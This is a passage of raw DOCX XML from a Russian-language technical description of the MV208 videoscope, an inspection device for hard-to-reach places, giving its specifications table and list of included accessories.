          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>TM</w:t>
      </w:r>
      <w:r w:rsidRPr="005D4582">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> MV208 используется для осмотра труднодоступных мест, как правило, скрытых от прямого визуального наблюдения. Во внутренней флэш-памяти видеоскопа или на съемной карте памяти Micro SD (дополнительный компонент) могут храниться цифровые фотографии и видеозаписи в формате MPEG2 или MPEG1. Видеоскоп обладает не только эргономичной конструкцией, полноцветным ЖК-дисплеем с диагональю экрана 2,4 дюйма и функцией автофокусировки, но и позволяет осматривать объекты на расстоянии до 1 дюйма и передавать потоковое цифровое видео непосредственно на компьютер. Универсальный видеоскоп представляет собой экономичное решение, используемое для максимально безопасного, быстрого и экономически эффективного осмотра механизмов, оборудования и</w:t>
      </w:r>
      <w:r w:rsidRPr="005D4582">
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005D4582">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>инфраструктуры.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00164BF4" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="66" w:name="_bookmark6"/>
      <w:bookmarkEnd w:id="66"/>
      <w:r w:rsidRPr="00164BF4">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Технические</w:t>
      </w:r>
      <w:r w:rsidRPr="00164BF4">
        <w:rPr>
          <w:spacing w:val="-9"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00164BF4">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>характеристики</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="002F75CB" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
          <w:tab w:val="left" w:pos="1134"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="2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2902"/>
        <w:gridCol w:w="6133"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="002F75CB" w:rsidTr="00523CE5">
        <w:trPr>
          <w:trHeight w:val="935"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2902" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00523CE5" w:rsidRDefault="00B45DB0" w:rsidP="00523CE5">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="27"/>
                <w:tab w:val="left" w:pos="1134"/>
                <w:tab w:val="left" w:pos="2086"/>
              </w:tabs>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:left="27"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Рекомендуемый</w:t>
            </w:r>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>вариант применения</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Внутри помещений</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="003A66C2" w:rsidTr="00523CE5">
        <w:trPr>
          <w:trHeight w:val="1680"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2902" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00523CE5" w:rsidRDefault="00B45DB0" w:rsidP="00523CE5">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="27"/>
                <w:tab w:val="left" w:pos="1134"/>
                <w:tab w:val="left" w:pos="1759"/>
              </w:tabs>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:left="27"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Оптимальное</w:t>
            </w:r>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>расстояние осмотра</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От 1 до 14 дюймов (или от 2,5 см до 35,6 см) для видеоголовки диаметром 8,5</w:t>
            </w:r>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:spacing w:val="-2"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>мм</w:t>
            </w:r>
          </w:p>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От 3/8 до 12 дюймов (или от 0,95 см до 30 см) для видеоголовки диаметром 5,5</w:t>
            </w:r>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:spacing w:val="-2"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>мм</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="003A66C2" w:rsidTr="00523CE5">
        <w:trPr>
          <w:trHeight w:val="1130"/>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Захват изображений</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 xml:space="preserve">Фотографии в формате </w:t>
            </w:r>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>JPG</w:t>
            </w:r>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve"> (640 </w:t>
            </w:r>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>x</w:t>
            </w:r>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve"> 480) Видеозаписи в формате </w:t>
            </w:r>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>AVI</w:t>
            </w:r>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve"> (320 </w:t>
            </w:r>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>x</w:t>
            </w:r>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve"> 240)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="002F75CB" w:rsidTr="00523CE5">
        <w:trPr>
          <w:trHeight w:val="659"/>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Тип дисплея</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Жидкокристаллический, диагональ 2,4 дюйма, TFT</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="002F75CB" w:rsidTr="00523CE5">
        <w:trPr>
          <w:trHeight w:val="659"/>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Разрешение экрана</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320 x 240</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="003A66C2" w:rsidTr="00523CE5">
        <w:trPr>
          <w:trHeight w:val="660"/>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Источник электропитания</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 xml:space="preserve">4 щелочных батарейки типа </w:t>
            </w:r>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>AA</w:t>
            </w:r>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve"> (1,5 В)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="002F75CB" w:rsidTr="00523CE5">
        <w:trPr>
          <w:trHeight w:val="659"/>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Ресурс элементов питания</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3-4 часа непрерывного использования</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="003A66C2" w:rsidTr="00523CE5">
        <w:trPr>
          <w:trHeight w:val="659"/>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Размеры</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 xml:space="preserve">184 </w:t>
            </w:r>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>x</w:t>
            </w:r>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve"> 162,5 </w:t>
            </w:r>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>x</w:t>
            </w:r>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve"> 78 мм (7,24 </w:t>
            </w:r>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>x</w:t>
            </w:r>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve"> 6,39 </w:t>
            </w:r>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>x</w:t>
            </w:r>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve"> 3,07 дюйма)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="002F75CB" w:rsidTr="00523CE5">
        <w:trPr>
          <w:trHeight w:val="661"/>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Вес</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0,23 кг (0,46 фунта)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="003A66C2" w:rsidTr="00523CE5">
        <w:trPr>
          <w:trHeight w:val="935"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2902" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom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lastRenderedPageBreak/>
              <w:t>Накопитель данных</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6133" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom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 xml:space="preserve">Карта памяти </w:t>
            </w:r>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Micro</w:t>
            </w:r>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>SD</w:t>
            </w:r>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve"> (дополнительный компонент, не входит в комплект</w:t>
            </w:r>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:spacing w:val="-4"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>поставки)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="003A66C2"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Управление изображением</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Масштабирование, осмотр в условиях слабого освещения</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7"/>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Подсветка</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Полностью настраиваемая светодиодная подсветка</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="003A66C2"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Длина зонда</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1 м (3 фута) с возможностью увеличения до 6 м (19 футов) при использовании дополнительных удлинителей</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="003A66C2"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67"/>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 w:val="left" w:pos="1570"/>
              </w:tabs>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:left="27"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Диаметр</w:t>
            </w:r>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:tab/>
              <w:t>видеоголовки зонда</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8,5 мм (0,33 дюйма) — входит в стандартную комплектацию, и 5,5 мм (0,22 дюйма) — заказывается отдельно.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="003A66C2"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2"/>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966"/>
                <w:tab w:val="left" w:pos="1134"/>
                <w:tab w:val="left" w:pos="1402"/>
              </w:tabs>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:left="27"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Защита</w:t>
            </w:r>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:tab/>
              <w:t>от</w:t>
            </w:r>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>проникновения влаги</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Видеоголовка и зонд длиной до 3 м (10 футов)</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Дополнительные разъемы</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USB, видеовыход (ТВ)</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 w:val="left" w:pos="2144"/>
              </w:tabs>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:left="27"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Диапазон</w:t>
            </w:r>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>рабочих температур</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Основной</w:t>
            </w:r>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:spacing w:val="28"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>модуль:</w:t>
            </w:r>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:spacing w:val="28"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>от</w:t>
            </w:r>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:spacing w:val="28"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:spacing w:val="27"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>°</w:t>
            </w:r>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>C</w:t>
            </w:r>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:spacing w:val="28"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>до</w:t>
            </w:r>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:spacing w:val="27"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>+45</w:t>
            </w:r>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:spacing w:val="27"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>°</w:t>
            </w:r>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>C</w:t>
            </w:r>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>;</w:t>
            </w:r>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:spacing w:val="28"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>Зонд:</w:t>
            </w:r>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:spacing w:val="28"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>от</w:t>
            </w:r>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:spacing w:val="33"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>-10</w:t>
            </w:r>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:spacing w:val="27"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>°С</w:t>
            </w:r>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:spacing w:val="28"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>до</w:t>
            </w:r>
          </w:p>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+80 °С</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 w:val="left" w:pos="1810"/>
              </w:tabs>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:left="27"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Диапазон</w:t>
            </w:r>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>температур хранения</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от -20 °С до +70 °С</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4"/>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 w:val="left" w:pos="1904"/>
              </w:tabs>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:left="27"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Относительная</w:t>
            </w:r>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>влажность при</w:t>
            </w:r>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:spacing w:val="-1"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00523CE5">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>эксплуатации</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5 … 95 %, без конденсации (основной блок)</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Видеовыход</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RCA</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Телевизионный выход</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NTSC, PAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="002F75CB" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
          <w:tab w:val="left" w:pos="1134"/>
          <w:tab w:val="left" w:pos="10206"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00164BF4" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00164BF4">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Дополнительные принадлежности, входящие в комплект поставки</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t xml:space="preserve">1)Пластмассовый футляр </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t>2)Руководство пользователя</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t xml:space="preserve">3)Видеоголовка и зонд (диаметр 8,5 мм, входит в стандартную комплектацию) </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t>4)Насадки с магнитом, крючком и зеркалом</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t>5)USB-кабель</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t>6)Видеокабель (ТВ кабель)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00233B41" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
          <w:tab w:val="left" w:pos="1134"/>
        </w:tabs>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="67" w:name="_bookmark8"/>
      <w:bookmarkEnd w:id="67"/>
      <w:r w:rsidRPr="00233B41">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Компоненты и разъемы</w:t>
      </w:r>
      <w:r w:rsidRPr="00233B41">
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
